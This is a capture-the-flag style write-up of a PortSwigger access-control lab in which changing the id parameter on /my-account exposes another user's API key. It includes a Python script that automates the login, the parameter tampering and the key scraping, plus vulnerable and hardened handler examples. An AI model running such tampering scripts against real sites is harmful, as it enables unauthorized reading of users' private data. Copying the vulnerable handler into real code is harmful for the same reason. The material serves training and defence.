🗂️PortSwigger Lab Writeup: User ID Controlled by Request Parameter

🎯 Objective
The objective of this lab is to exploit a broken access control: the user account page has a horizontal privilege escalation vulnerability, because the account shown is chosen by a request parameter rather than by the logged-in session. The goal is to obtain the API key for the user carlos.
- Lab URL: https://portswigger.net/web-security/access-control/lab-user-id-controlled-by-request-parameter
- Category: Access Control
- Difficulty: Apprentice
🧪 Exploitation Steps
🕵️Step 1: Observe the Website
- First, open the lab URL in your browser and observe what the site is about and how it works.
- At first glance, the website is a shopping site with a login page. The lab description states that we need to obtain the API key for the user carlos.
📝Step 2: Login as wiener
- Log in with the credentials of user wiener (the lab provides wiener:peter) to reach the account page first.
- On the account page, /my-account?id=wiener, we can see wiener's API key. Note that the account being displayed is selected by the id query parameter, not by the session cookie.
- Change /my-account?id=wiener to /my-account?id=carlos to load carlos's account page. The server never checks that the logged-in user owns the requested account, so the request succeeds.
- Hence we can now see the API key of user carlos.
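The same three requests, automated. This is an added example and not code from the writeup or from PortSwigger: the login path and form field names, and the HTML layout the regex expects, are assumptions modelled on typical PortSwigger labs, and the sample page body is constructed. Only the id parameter differs between the attacker's own page and the victim's.

```python
"""Added example, not part of the original writeup: automating Step 2.

Logs in as the low-privilege user, then requests /my-account with the id
parameter switched to the victim and pulls the API key out of the page.
The /login path, the login form field names and the HTML layout below are
assumptions based on typical PortSwigger labs, not copied from this lab.
"""
import http.cookiejar
import re
import sys
import urllib.parse
import urllib.request
from typing import Optional


def account_url(base: str, user: str) -> str:
    """Build the account URL; only the id parameter separates wiener's page from carlos's."""
    return f"{base.rstrip('/')}/my-account?{urllib.parse.urlencode({'id': user})}"


# Matches "Your API Key is: KEY", tolerating inline tags such as <span> around the key.
API_KEY_RE = re.compile(r"Your API Key is:\s*(?:<[^>]+>\s*)*([A-Za-z0-9]+)")


def extract_api_key(html: str) -> Optional[str]:
    """Return the API key shown on an account page, or None if the page has none."""
    match = API_KEY_RE.search(html)
    return match.group(1) if match else None


def fetch_victim_key(base: str, username: str, password: str, victim: str) -> Optional[str]:
    """Log in as `username`, then read `victim`'s API key via the tampered id parameter."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    # Step 2a: authenticate as the attacker-controlled account; the session cookie lands in the jar.
    form = urllib.parse.urlencode({"username": username, "password": password}).encode()
    opener.open(f"{base.rstrip('/')}/login", data=form)
    # Step 2b: same session, different id. A correct server would ignore or reject this.
    with opener.open(account_url(base, victim)) as resp:
        return extract_api_key(resp.read().decode("utf-8", errors="replace"))


# Constructed sample of what an account page body might look like (not a real lab response).
SAMPLE_HTML = (
    "<h1>My Account</h1><p>Your username is: carlos</p>"
    '<div>Your API Key is: <span id="api-key">k3yF0rCarlos1234</span></div>'
)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"usage: {sys.argv[0]} https://<lab-id>.web-security-academy.net")
        sys.exit(1)
    # wiener:peter are the credentials PortSwigger labs issue for the low-privilege user.
    print(fetch_victim_key(sys.argv[1], "wiener", "peter", "carlos"))
```

Run it with the lab's base URL as the only argument; if the login form on a given lab differs (for example, a CSRF token field), adjust the form dictionary in fetch_victim_key accordingly.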
🧑💼Step 3: Submit the API key of carlos
- Copy the API key of carlos and submit it via Submit Solution.

- Finally, the lab is solved.
🧠 Conclusion
- This lab demonstrated horizontal privilege escalation through user ID parameter tampering. By changing id=wiener to id=carlos in the URL, we accessed another user's sensitive account data without authorization.
- The impact is high: because usernames are predictable, an attacker can enumerate and read any user's private data, including API keys, email addresses and other sensitive information, simply by modifying a request parameter.
- Fix: enforce server-side authorization on every resource access. Derive the current user from the session, and either ignore the id parameter or reject any value that does not match the session user. Unguessable identifiers (UUIDs) make enumeration harder and are worth adding as defence in depth, but they do not replace the ownership check, since an attacker who learns another user's identifier would still be served their data. Apply the same enforcement to all endpoints regardless of whether the data appears sensitive.
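To make the fix concrete, here is the vulnerable handler next to a hardened one, as an added example rather than code from the lab or from PortSwigger. It is framework-free so it runs offline; the user table, the API keys and the opaque identifiers are constructed sample data. The third handler shows why the conclusion treats UUID-style identifiers as defence in depth only: without the ownership check, an attacker who obtains the identifier is still served the victim's key.

```python
"""Added example, not part of the original writeup: vulnerable vs hardened account handlers.

USERS and OPAQUE_IDS are constructed data (fresh random values on every run).
"""
import secrets
from typing import Dict, Optional, Tuple

USERS: Dict[str, Dict[str, str]] = {
    "wiener": {"api_key": secrets.token_hex(16)},
    "carlos": {"api_key": secrets.token_hex(16)},
}

# Stand-in for UUID-style identifiers: an unguessable id mapped to a username.
OPAQUE_IDS: Dict[str, str] = {secrets.token_urlsafe(16): name for name in USERS}

Response = Tuple[int, Optional[str]]  # (HTTP status, API key or None)


def vulnerable_my_account(session_user: str, query: Dict[str, str]) -> Response:
    """Before: trusts ?id= as the identity, so any logged-in user can read any account."""
    target = query.get("id", session_user)
    user = USERS.get(target)
    if user is None:
        return 404, None
    return 200, user["api_key"]


def hardened_my_account(session_user: str, query: Dict[str, str]) -> Response:
    """After: the identity comes from the session; ?id= may only agree with it."""
    target = query.get("id", session_user)
    if target != session_user:
        # Ownership check on the server. A 403 makes the rejection explicit; serving the
        # caller's own page or returning 404 is equally valid as long as nothing leaks.
        return 403, None
    return 200, USERS[session_user]["api_key"]


def opaque_but_unchecked(session_user: str, query: Dict[str, str]) -> Response:
    """UUID-style ids without an ownership check: harder to enumerate, still broken."""
    target = OPAQUE_IDS.get(query.get("id", ""))
    if target is None:
        return 404, None
    # The session user is never consulted, so a leaked or shared id exposes the account.
    return 200, USERS[target]["api_key"]


if __name__ == "__main__":
    attack = {"id": "carlos"}
    print("vulnerable:", vulnerable_my_account("wiener", attack))
    print("hardened:  ", hardened_my_account("wiener", attack))
    carlos_opaque = next(k for k, v in OPAQUE_IDS.items() if v == "carlos")
    print("opaque only:", opaque_but_unchecked("wiener", {"id": carlos_opaque}))
```

The check in hardened_my_account is the whole fix: the only source of truth for "whose account" is the authenticated session, and the query parameter is reduced to something that must agree with it. Everything else (opaque ids, rate limiting, logging) narrows the attacker's options but does not remove the vulnerability.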